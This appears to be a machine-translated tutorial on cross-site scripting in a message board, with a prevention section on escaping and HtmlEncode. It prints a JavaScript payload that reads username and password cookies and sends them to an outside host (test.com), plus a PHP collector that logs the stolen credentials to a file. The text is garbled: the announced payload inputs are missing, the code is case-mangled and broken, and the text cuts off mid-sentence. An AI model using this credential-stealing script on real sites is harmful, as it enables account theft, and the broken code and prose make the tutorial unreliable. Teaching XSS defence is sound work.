XSS vulnerability for cross-site scripting attacks

The AddElement () method is used to add a new message, while the Rendercomments () method is used to show the message list, and the Web page looks like this

Xss

Because we fully trust the user input, but some of the ulterior motives of the user will be like this input

So no matter who accesses this page when the console will output "Hey you is a fool fish!", if this is just a malicious little joke, some people do things are not cute, some users will use this vulnerability to steal user information, trick people to open malicious websites or download malicious programs, etc. Look at the simplest example.

Using XSS to steal user name passwords

Of course, this example is simple enough to attack almost any website, just to see how it works. We know that many landing interface has the ability to remember the user name, password to facilitate the next login, some sites are directly logged in clear text user name, password, malicious user registered account login after using simple tools to view the cookie structure name, if the site has an XSS vulnerability, It is easy to use JSONP to get the user name and password of other users.

A malicious user would enter this

Let's see what's hidden in http://test.com/hack.js.

var Username=cookiehelper.getcookie (' username '). Value;var password=cookiehelper.getcookie (' password '). Value;var Script =document.createelement (' script '); script.src= ' http://test.com/index.php?username= ' +username+ ' & Password= ' +password;document.body.appendchild (script);

A few simple JavaScript, get the user name password in the cookie, use JSONP to http://test.com/index.php

A GET request was sent

http://test.com/index.php

<?php    if (!empty ($_get[' password ')) {        $username =$_get[' username '];        $password =$_get[' password '];                try{            $path =$_server["Document_root"]. ' /password.txt ';            $FP =fopen ($path, ' a ');            Flock ($FP, lock_ex);            Fwrite ($fp, "$username \ t $password \ r \ n");            Flock ($FP, lock_un);            Fclose ($FP);        } catch (Exception $e) {        }    }?>

This allows malicious users to steal information from users who access the message board.

How to prevent

The above demo is a very simple XSS attack, there are many hidden ways, but its core is the use of script injection, so our solution is very simple, do not trust the user input, the special word such as "<", ">" Escape, you can fundamentally prevent this problem, Of course, many solutions have specific limitations on XSS, such as the above practice in ASP. NET, Microsoft ValidateRequest automatically do XSS validation of form submission. But impossible, always some clever malicious users will go to our site to sabotage, to their own site is not at ease can see this XSS cross-site test code Daquan testing site is safe.

When a message pops up inside the system, just redirect the user to Showmessage.ashx? Msg= News is

Yes, like

Response.Redirect ("Showmessage.ashx? msg= user name cannot be empty! ");

We can detect the requested data, if there is < in the request data is considered a malicious request, prohibit

Submit. The disadvantage of ASPX is that this strategy is adopted by default if you are doing a programmer's forum

, programmers will not be able to post HTML code, so a better processing strategy is to put the user published

The content is displayed as is, not HTML. Use

Httputility.htmlencode can convert special characters such as <, >, and so on in a string to HTML display.

Characters, that is, not to <script> as a label to define the script, but as a "&lt;script&gt;" This will

To the content displayed directly on the page.

Modify the View post code, the context. Response.Write (line + "

XSS vulnerability for cross-site scripting attacks